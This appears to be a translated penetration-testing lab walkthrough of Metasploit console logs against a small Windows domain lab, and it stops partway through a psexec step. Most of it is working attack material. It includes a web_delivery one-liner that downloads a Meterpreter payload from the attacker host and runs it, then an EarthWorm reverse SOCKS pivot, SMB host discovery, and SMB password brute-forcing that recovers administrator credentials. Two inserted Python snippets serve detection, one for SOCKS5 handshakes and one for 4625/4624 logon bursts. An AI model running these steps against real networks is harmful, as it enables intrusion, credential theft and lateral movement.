1. Setting up the listener
use exploit/multi/script/web_delivery
......
msf6 exploit(multi/script/web_delivery) > set lport 4444
lport => 4444
msf6 exploit(multi/script/web_delivery) > set SRVPORT 80
SRVPORT => 80
msf6 exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.1.25:4444
[*] Using URL: http://192.168.1.25/0796Iv35A4
msf6 exploit(multi/script/web_delivery) > [*] Server started.
[*] Run the following command on the target machine:
wget -qO msAjJhyl --no-check-certificate http://192.168.1.25/0796Iv35A4; chmod +x msAjJhyl; ./msAjJhyl& disown
[*] 192.168.1.21 web_delivery - Delivering Payload (250 bytes)
[*] Sending stage (3045348 bytes) to 192.168.1.21
[*] Meterpreter session 4 opened (192.168.1.25:4444 -> 192.168.1.21:41080) at 2023-12-04 08:26:03 +0800
msf6 exploit(multi/script/web_delivery) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
4 meterpreter x64/linux firefart @ localhost.localdomain 192.168.1.25:4444 -> 192.168.1.21:41080 (192.168.1.21)
Module options (exploit/multi/script/web_delivery):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 80 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.25 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
7 Linux
View the full module info with the info, or info -d command.
msf6 exploit(multi/script/web_delivery) >
[firefart@localhost tmp]# wget -qO msAjJhyl --no-check-certificate http://192.168.1.25/0796Iv35A4; chmod +x msAjJhyl; ./msAjJhyl& disown
[1] 12342
2. Entering Meterpreter
msf6 exploit(multi/script/web_delivery) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
4 meterpreter x64/linux firefart @ localhost.localdomain 192.168.1.25:4444 -> 192.168.1.21:41080 (192.168.1.21)
msf6 exploit(multi/script/web_delivery) > sessions -i 4
[*] Starting interaction with 4...
meterpreter > getuid
Server username: firefart
meterpreter >
3. Adding an internal route
meterpreter > background
[*] Backgrounding session 4...
msf6 exploit(multi/script/web_delivery) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
4 meterpreter x64/linux firefart @ localhost.localdomain 192.168.1.25:4444 -> 192.168.1.21:41080 (192.168.1.21)
msf6 exploit(multi/script/web_delivery) >
msf6 exploit(multi/script/web_delivery) > route add 192.168.93.0 255.255.255.0 4
[*] Route already exists
msf6 exploit(multi/script/web_delivery) >
# destination network 192.168.93.0, netmask 255.255.255.0, next hop session 4
4. SOCKS5 proxy
The internal penetration and listener setup above were all done inside msfconsole. Route forwarding only brings msfconsole into the internal network; to bring the other programs on the attacking machine in as well, a SOCKS proxy is also needed.
Use EarthWorm to set up a reverse SOCKS5 proxy
1. EarthWorm tunnelling tool
./ew_for_linux64 -s rcsocks -l 9898 -e 6767
# forward the local data received on port 9898 to port 6767 on the web server
# local traffic is sent out through port 9898
# rcsocks and rssocks are used for reverse connections
# ssocks is used for forward connections
# -l  the local port to listen on
# -e  the port on the machine to bounce back to
# -d  the IP of the machine to bounce back to
# -f  the IP of the machine to connect to actively
# -g  the port of the machine to connect to actively
# -t  the timeout, default 1000
^C[firefart@localhost tmp]# ls
dirty dirty.c passwd.bak shell.elf yum.log
[firefart@localhost tmp]# wget http://192.168.1.25:8080/ew_for_linux64
--2019-10-07 13:22:27-- http://192.168.1.25:8080/ew_for_linux64
正在连接 192.168.1.25:8080... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:28080 (27K) [application/octet-stream]
正在保存至: “ew_for_linux64”
100%[================================================================================================================================================================================================================>] 28,080 --.-K/s in 0.001s
2019-10-07 13:22:27 (34.7 MB/s) - 已保存 “ew_for_linux64” [28080/28080])
[firefart@localhost tmp]# ls
dirty dirty.c ew_for_linux64 passwd.bak shell.elf yum.log
[firefart@localhost tmp]# chmod +x ew_for_linux64
[firefart@localhost tmp]# ls
dirty dirty.c ew_for_linux64 passwd.bak shell.elf yum.log
[firefart@localhost tmp]#
┌──(root㉿ru)-[~/…/neiwang/EarthWorm/download/products]
└─# ./ew_for_linux64 -s rcsocks -l 9898 -e 6767
rcsocks 0.0.0.0:5656 <--[10000 usec]--> 0.0.0.0:6767
init cmd_server_for_rc here
start listen port here
rssocks cmd_socket OK!
[firefart@localhost tmp]# ./ew_for_linux64 -s rssocks -d 192.168.1.25 -e 6767
rssocks 192.168.1.25:6767 <--[10000 usec]--> socks server
2. Configuring the proxychains4.conf file
┌──(root㉿ru)-[~/lianxi]
└─# cat /etc/proxychains4.conf | grep "socks5"
# socks5 192.168.67.78 1080 lamer secret
# proxy types: http, socks4, socks5, raw
#socks5 127.0.0.1 2222
#socks5 116.211.207.100 8080
socks5 127.0.0.1 9898
Point the socks5 entry at port 9898; port 9898 forwards local traffic to port 6767, and port 6767 carries it into the internal network. After that, proxychains can bring our programs into the internal network.
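What proxychains hands to the 9898 listener above is a standard SOCKS5 handshake (RFC 1928), and the handshake is the stable thing to look for when a SOCKS listener turns up on a port nobody registered. The parser below is an added example of my own, not from the write-up or from EarthWorm; it decodes the client greeting and CONNECT request and reports the destination, so a sensor or endpoint agent can tell "SOCKS5 on port 9898 heading for 192.168.93.10:445" apart from ordinary traffic. `SAMPLE_CLIENT_STREAM` is constructed; only the no-authentication method is handled.

```python
import ipaddress
import struct

SOCKS_VERSION = 0x05
CMD_NAMES = {1: "CONNECT", 2: "BIND", 3: "UDP_ASSOCIATE"}
ATYP_IPV4, ATYP_DOMAIN, ATYP_IPV6 = 1, 3, 4

# Constructed client->server bytes: what a SOCKS5 client such as proxychains sends
# for a CONNECT to 192.168.93.10:445 when offering only the "no authentication" method.
SAMPLE_CLIENT_STREAM = (
    bytes([SOCKS_VERSION, 1, 0])                         # greeting: 1 method, NO AUTH
    + bytes([SOCKS_VERSION, 1, 0, ATYP_IPV4])            # request: CONNECT, RSV, IPv4
    + ipaddress.IPv4Address("192.168.93.10").packed
    + struct.pack("!H", 445)
)


def parse_greeting(data):
    """VER NMETHODS METHODS... (RFC 1928 section 3). Returns methods and bytes consumed."""
    if len(data) < 2 or data[0] != SOCKS_VERSION:
        return None
    n = data[1]
    if n == 0 or len(data) < 2 + n:
        return None
    return {"methods": list(data[2:2 + n]), "consumed": 2 + n}


def parse_request(data):
    """VER CMD RSV ATYP DST.ADDR DST.PORT (RFC 1928 section 4)."""
    if len(data) < 4 or data[0] != SOCKS_VERSION or data[2] != 0:
        return None
    cmd, atyp = data[1], data[3]
    if atyp == ATYP_IPV4:
        end = 8
        if len(data) < end + 2:
            return None
        host = str(ipaddress.IPv4Address(data[4:8]))
    elif atyp == ATYP_DOMAIN:
        if len(data) < 5:
            return None
        end = 5 + data[4]                                # length-prefixed name
        if len(data) < end + 2:
            return None
        host = data[5:end].decode("ascii", "replace")
    elif atyp == ATYP_IPV6:
        end = 20
        if len(data) < end + 2:
            return None
        host = str(ipaddress.IPv6Address(data[4:20]))
    else:
        return None
    port = struct.unpack("!H", data[end:end + 2])[0]
    return {"cmd": CMD_NAMES.get(cmd, f"cmd{cmd}"), "host": host, "port": port}


def classify_flow(client_bytes, dst_port):
    """Label a client stream as SOCKS5 when a valid greeting is directly followed by
    a valid request (the NO AUTH path). The listener port is reported so that
    anything other than 1080 can be alerted on; tunnelling tools pick arbitrary
    ports, 9898 in the setup above."""
    g = parse_greeting(client_bytes)
    if g is None:
        return None
    req = parse_request(client_bytes[g["consumed"]:])
    if req is None:
        return None
    return {**req, "auth_methods": g["methods"], "port_is_standard": dst_port == 1080}


if __name__ == "__main__":
    print(classify_flow(SAMPLE_CLIENT_STREAM, 9898))
```

When the server selects the username/password method instead, an RFC 1929 sub-negotiation sits between the greeting and the request, so a production parser has to consume the server's method-selection reply before deciding what the next client bytes mean.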
5. Internal host discovery
1. First module
msf6 exploit(multi/script/web_delivery) > use auxiliary/scanner/discovery/udp_probe
msf6 auxiliary(scanner/discovery/udp_probe) > show options
Module options (auxiliary/scanner/discovery/udp_probe):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
THREADS 1 yes The number of concurrent threads (max one per host)
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/discovery/udp_probe) > set rhost 192.168.93.0-255
rhost => 192.168.93.0-255
msf6 auxiliary(scanner/discovery/udp_probe) > set THREADS 5
THREADS => 5
msf6 auxiliary(scanner/discovery/udp_probe) >
msf6 auxiliary(scanner/discovery/udp_probe) > run
[-] Unknown error: 192.168.93.0:5632 Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1 ["/usr/share/metasploit-framework/lib/rex/post/meterpreter/channel.rb:116:in `create'", "/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb:38:in `open'", "/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:143:in `create_udp_channel'", "/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:96:in `create'", "/usr/share/metasploit-framework/lib/msf/base/sessions/meterpreter.rb:587:in `create'", "/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.52/lib/rex/socket.rb:51:in `create_param'", "/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.52/lib/rex/socket/udp.rb:39:in `create_param'", "/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.52/lib/rex/socket/udp.rb:30:in `create'", "/usr/share/metasploit-framework/modules/auxiliary/scanner/discovery/udp_probe.rb:76:in `block in run_host'", "/usr/share/metasploit-framework/modules/auxiliary/scanner/discovery/udp_probe.rb:66:in `each'", "/usr/share/metasploit-framework/modules/auxiliary/scanner/discovery/udp_probe.rb:66:in `run_host'", "/usr/share/metasploit-framework/lib/msf/core/auxiliary/scanner.rb:124:in `block (2 levels) in run'", "/usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn'"]
[+] Discovered DNS on 192.168.93.10:53 (Microsoft DNS)
[+] Discovered NetBIOS on 192.168.93.10:137 (WIN-8GA56TNV3MV:<00>:U :TEST:<00>:G :TEST:<1c>:G :WIN-8GA56TNV3MV:<20>:U :TEST:<1b>:U :00:0c:29:1f:54:d2)
[+] Discovered NTP on 192.168.93.10:123 (1c0104fa00000000000a16634c4f434ce9179267a83fa2adc54f234b71b152f3e917aaa60c16aceae917aaa60c16acea)
[+] Discovered NetBIOS on 192.168.93.20:137 (WIN2008:<00>:U :TEST:<00>:G :WIN2008:<20>:U :00:0c:29:ab:44:ec)
[+] Discovered MSSQL on 192.168.93.20:1434 (ServerName=WIN2008 InstanceName=MSSQLSERVER IsClustered=No Version=10.0.1600.22 tcp=1433 )
[*] Scanned 26 of 256 hosts (10% complete)
[+] Discovered NetBIOS on 192.168.93.30:137 (WIN7:<20>:U :WIN7:<00>:U :TEST:<00>:G :TEST:<1e>:G :TEST:<1d>:U :__MSBROWSE__:<01>:G :00:0c:29:e0:74:2b)
[*] Scanned 52 of 256 hosts (20% complete)
[*] Scanned 77 of 256 hosts (30% complete)
[*] Scanned 104 of 256 hosts (40% complete)
[*] Scanned 128 of 256 hosts (50% complete)
[*] Scanned 154 of 256 hosts (60% complete)
[*] Scanned 180 of 256 hosts (70% complete)
[*] Scanned 205 of 256 hosts (80% complete)
[*] Scanned 231 of 256 hosts (90% complete)
[-] Unknown error: 192.168.93.255:5632 Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1 ["/usr/share/metasploit-framework/lib/rex/post/meterpreter/channel.rb:116:in `create'", "/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb:38:in `open'", "/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:143:in `create_udp_channel'", "/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:96:in `create'", "/usr/share/metasploit-framework/lib/msf/base/sessions/meterpreter.rb:587:in `create'", "/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.52/lib/rex/socket.rb:51:in `create_param'", "/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.52/lib/rex/socket/udp.rb:39:in `create_param'", "/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.52/lib/rex/socket/udp.rb:30:in `create'", "/usr/share/metasploit-framework/modules/auxiliary/scanner/discovery/udp_probe.rb:76:in `block in run_host'", "/usr/share/metasploit-framework/modules/auxiliary/scanner/discovery/udp_probe.rb:66:in `each'", "/usr/share/metasploit-framework/modules/auxiliary/scanner/discovery/udp_probe.rb:66:in `run_host'", "/usr/share/metasploit-framework/lib/msf/core/auxiliary/scanner.rb:124:in `block (2 levels) in run'", "/usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn'"]
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
Three internal hosts were discovered:
192.168.93.10
192.168.93.20
192.168.93.30
2. Second module
msf6 auxiliary(scanner/discovery/udp_probe) > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > show options
Module options (auxiliary/scanner/smb/smb_version):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
THREADS 1 yes The number of concurrent threads (max one per host)
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.93.0-255
rhosts => 192.168.93.0-255
msf6 auxiliary(scanner/smb/smb_version) > set THREADS 5
THREADS => 5
msf6 auxiliary(scanner/smb/smb_version) > run
[-] 192.168.93.0:445 - 192.168.93.0: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.0:139 - 192.168.93.0: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.1:445 - 192.168.93.1: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.2:445 - 192.168.93.2: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.4:445 - 192.168.93.4: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.3:445 - 192.168.93.3: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.5:445 - 192.168.93.5: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.1:139 - 192.168.93.1: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.2:139 - 192.168.93.2: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.4:139 - 192.168.93.4: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.5:139 - 192.168.93.5: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.3:139 - 192.168.93.3: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.6:445 - 192.168.93.6: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.7:445 - 192.168.93.7: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.8:445 - 192.168.93.8: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.9:445 - 192.168.93.9: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[*] 192.168.93.10:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:required) (uptime:1w 2d 19h 13m 13s) (guid:{74fd7a72-fc98-4951-9b1b-01e0f1cf7935}) (authentication domain:TEST)Windows 2012 R2 Datacenter (build:9600) (name:WIN-8GA56TNV3MV) (domain:TEST)
[+] 192.168.93.10:445 - Host is running SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:required) (uptime:1w 2d 19h 13m 13s) (guid:{74fd7a72-fc98-4951-9b1b-01e0f1cf7935}) (authentication domain:TEST)Windows 2012 R2 Datacenter (build:9600) (name:WIN-8GA56TNV3MV) (domain:TEST)
[-] 192.168.93.6:139 - 192.168.93.6: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.7:139 - 192.168.93.7: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.9:139 - 192.168.93.9: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.8:139 - 192.168.93.8: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.12:445 - 192.168.93.12: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.11:445 - 192.168.93.11: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.13:445 - 192.168.93.13: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.14:445 - 192.168.93.14: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.15:445 - 192.168.93.15: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.12:139 - 192.168.93.12: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.11:139 - 192.168.93.11: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.13:139 - 192.168.93.13: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.14:139 - 192.168.93.14: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.15:139 - 192.168.93.15: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[*] 192.168.93.20:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.0.2) (signatures:optional) (uptime:207w 1d 13h 49m 52s) (guid:{f9644969-0bf4-48c7-ab87-58ba8044ed81}) (authentication domain:TEST)Windows 2008 Datacenter SP2 (build:6003) (name:WIN2008) (domain:TEST)
[+] 192.168.93.20:445 - Host is running SMB Detected (versions:1, 2) (preferred dialect:SMB 2.0.2) (signatures:optional) (uptime:207w 1d 13h 49m 52s) (guid:{f9644969-0bf4-48c7-ab87-58ba8044ed81}) (authentication domain:TEST)Windows 2008 Datacenter SP2 (build:6003) (name:WIN2008) (domain:TEST)
[-] 192.168.93.16:445 - 192.168.93.16: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.17:445 - 192.168.93.17: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.18:445 - 192.168.93.18: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.19:445 - 192.168.93.19: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.16:139 - 192.168.93.16: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.17:139 - 192.168.93.17: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.18:139 - 192.168.93.18: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.19:139 - 192.168.93.19: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.21:445 - 192.168.93.21: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.22:445 - 192.168.93.22: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.23:445 - 192.168.93.23: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.24:445 - 192.168.93.24: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.25:445 - 192.168.93.25: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.21:139 - 192.168.93.21: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.22:139 - 192.168.93.22: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.23:139 - 192.168.93.23: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.24:139 - 192.168.93.24: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.25:139 - 192.168.93.25: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[*] 192.168.93.0-255: - Scanned 26 of 256 hosts (10% complete)
[-] 192.168.93.26:445 - 192.168.93.26: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[*] 192.168.93.30:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:213w 4d 10h 36m 33s) (guid:{5cc9a08c-4395-4e1d-95be-f93ec2195144}) (authentication domain:TEST)Windows 7 Professional SP1 (build:7601) (name:WIN7) (domain:TEST)
[+] 192.168.93.30:445 - Host is running SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:213w 4d 10h 36m 33s) (guid:{5cc9a08c-4395-4e1d-95be-f93ec2195144}) (authentication domain:TEST)Windows 7 Professional SP1 (build:7601) (name:WIN7) (domain:TEST)
Still the same three internal hosts:
192.168.93.10 name:WIN-8GA56TNV3MV domain:TEST
192.168.93.20 name:WIN2008 domain:TEST
192.168.93.30 name:WIN7 domain:TEST
6、Internal network attack
1、Password brute-forcing
Use the auxiliary/scanner/smb/smb_login module to brute-force the SMB passwords of 192.168.93.10/20/30.
msf6 auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/smb/smb_login
msf6 auxiliary(scanner/smb/smb_login) > show options
Module options (auxiliary/scanner/smb/smb_login):
Name Current Setting Required Description
---- --------------- -------- -----------
ABORT_ON_LOCKOUT false yes Abort the run when an account lockout is detected
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
DETECT_ANY_AUTH false no Enable detection of systems accepting any authentication
DETECT_ANY_DOMAIN false no Detect if domain is required for the specified user
PASS_FILE no File containing passwords, one per line
PRESERVE_DOMAINS true no Respect a username that contains a domain name.
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RECORD_GUEST false no Record guest-privileged random logins to the database
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/smb/smb_login) > set SMBUser administrator
SMBUser => administrator
msf6 auxiliary(scanner/smb/smb_login) > run
[-] Msf::OptionValidateError The following options failed to validate: RHOSTS
msf6 auxiliary(scanner/smb/smb_login) > set rhosts 192.168.93.30
rhosts => 192.168.93.30
msf6 auxiliary(scanner/smb/smb_login) > run
[*] 192.168.93.30:445 - 192.168.93.10:445 - Starting SMB login bruteforce
[*] 192.168.93.30:445 - Error: 192.168.93.30: Metasploit::Framework::LoginScanner::Invalid Cred details can't be blank, Cred details can't be blank (Metasploit::Framework::LoginScanner::SMB)
[*] 192.168.93.30:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_login) >
This error occurs because no password wordlist was loaded.
msf6 auxiliary(scanner/smb/smb_login) > set PASS_FILE /usr/share/wordlists/rockyou.txt
PASS_FILE => /usr/share/wordlists/rockyou.txt
msf6 auxiliary(scanner/smb/smb_login) > set rhosts 192.168.93.30
rhosts => 192.168.93.30
msf6 auxiliary(scanner/smb/smb_login) > run
[*] 192.168.93.30:445 - 192.168.93.30:445 - Starting SMB login bruteforce
[-] 192.168.93.30:445 - 192.168.93.30:445 - Failed: '.\administrator:This is not a password',
[!] 192.168.93.30:445 - No active DB -- Credential data will not be saved!
[-] 192.168.93.30:445 - 192.168.93.30:445 - Failed: '.\administrator:zxcASDqwe!ASD',
[+] 192.168.93.30:445 - 192.168.93.30:445 - Success: '.\administrator:123qwe!ASD' Administrator
msf6 auxiliary(scanner/smb/smb_login) > set rhosts 192.168.93.20
rhosts => 192.168.93.20
msf6 auxiliary(scanner/smb/smb_login) > run
[*] 192.168.93.20:445 - 192.168.93.20:445 - Starting SMB login bruteforce
[-] 192.168.93.20:445 - 192.168.93.20:445 - Failed: '.\administrator:This is not a password',
[!] 192.168.93.20:445 - No active DB -- Credential data will not be saved!
[-] 192.168.93.20:445 - 192.168.93.20:445 - Failed: '.\administrator:zxcASDqwe!ASD',
[+] 192.168.93.20:445 - 192.168.93.20:445 - Success: '.\administrator:123qwe!ASD' Administrator
^C[*] 192.168.93.20:445 - Caught interrupt from the console...
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_login) > set rhosts 192.168.93.10
msf6 auxiliary(scanner/smb/smb_login) > run
[*] 192.168.93.10:445 - 192.168.93.10:445 - Starting SMB login bruteforce
[-] 192.168.93.10:445 - 192.168.93.10:445 - Failed: '.\administrator:This is not a password',
[!] 192.168.93.10:445 - No active DB -- Credential data will not be saved!
[+] 192.168.93.10:445 - 192.168.93.10:445 - Success: '.\administrator:zxcASDqw123!!' Administrator
^C[*] 192.168.93.10:445 - Caught interrupt from the console...
[*] Auxiliary module execution completed
192.168.93.30 administrator:123qwe!ASD
192.168.93.20 administrator:123qwe!ASD
192.168.93.10 administrator:zxcASDqw123!!
With that we have obtained the passwords for all of the hosts.
2、psexec tool
Use the psexec tool to attack the internal hosts.
Attack flow for 192.168.93.30
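From the defender's side, the smb_login run above shows up as a burst of failed network logons (event 4625, logon type 3) for one account from one source, followed by a successful 4624. The following detection logic is an added example, not code from the original write-up; the event records are constructed samples, and the source address 192.168.93.100 is assumed because the pivot traffic in this lab leaves the CentOS host.

```python
"""Detect SMB password brute-force patterns in Windows Security logon events.

Added example (not from the original write-up). Models a wordlist run against
one account: many 4625 failures from one source IP inside a short window,
then a 4624 success for the same (source, account) pair. All events below are
constructed sample data, not logs captured from the lab hosts.
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class LogonEvent:
    time: datetime
    event_id: int      # 4625 = logon failure, 4624 = logon success
    account: str
    source_ip: str
    logon_type: int    # 3 = network logon (SMB, WMI and psexec all use this)


def detect_bruteforce(events, fail_threshold=5, window=timedelta(minutes=5)):
    """Return alerts as (source_ip, account, failure_count, success_time).

    An alert is raised when at least `fail_threshold` failures for the same
    (source_ip, account) pair fall inside `window`. success_time is the time
    of a 4624 for that pair after the burst (password guessed), else None.
    """
    alerts = []
    by_pair = defaultdict(list)
    for ev in sorted(events, key=lambda e: e.time):
        if ev.logon_type != 3:          # interactive logons are out of scope
            continue
        by_pair[(ev.source_ip, ev.account.lower())].append(ev)
    for (src, acct), evs in by_pair.items():
        failures = [e for e in evs if e.event_id == 4625]
        for i, first in enumerate(failures):
            burst = [f for f in failures[i:] if f.time - first.time <= window]
            if len(burst) >= fail_threshold:
                last_fail = burst[-1].time
                success = next((e.time for e in evs
                                if e.event_id == 4624 and e.time >= last_fail),
                               None)
                alerts.append((src, acct, len(burst), success))
                break                   # one alert per pair is enough
    return alerts


def sample_events():
    """Constructed events: 8 failures in 8 seconds, then a success."""
    t0 = datetime(2023, 12, 4, 10, 20, 0)
    evs = [LogonEvent(t0 + timedelta(seconds=i), 4625, "administrator",
                      "192.168.93.100", 3) for i in range(8)]
    evs.append(LogonEvent(t0 + timedelta(seconds=9), 4624, "administrator",
                          "192.168.93.100", 3))
    # An unrelated console logon (type 2) that must not raise an alert
    evs.append(LogonEvent(t0, 4624, "win7", "192.168.93.30", 2))
    return evs


if __name__ == "__main__":
    for alert in detect_bruteforce(sample_events()):
        print(alert)
```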
msf6 auxiliary(scanner/smb/smb_login) > use exploit/windows/smb/psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf6 exploit(windows/smb/psexec) > set SMBUser administrator
SMBUser => administrator
msf6 exploit(windows/smb/psexec) > set SMBPass 123qwe!ASD
SMBPass => 123qwe!ASD
msf6 exploit(windows/smb/psexec) > set rhosts 192.168.93.30
rhosts => 192.168.93.30
msf6 exploit(windows/smb/psexec) > show options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.93.30 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
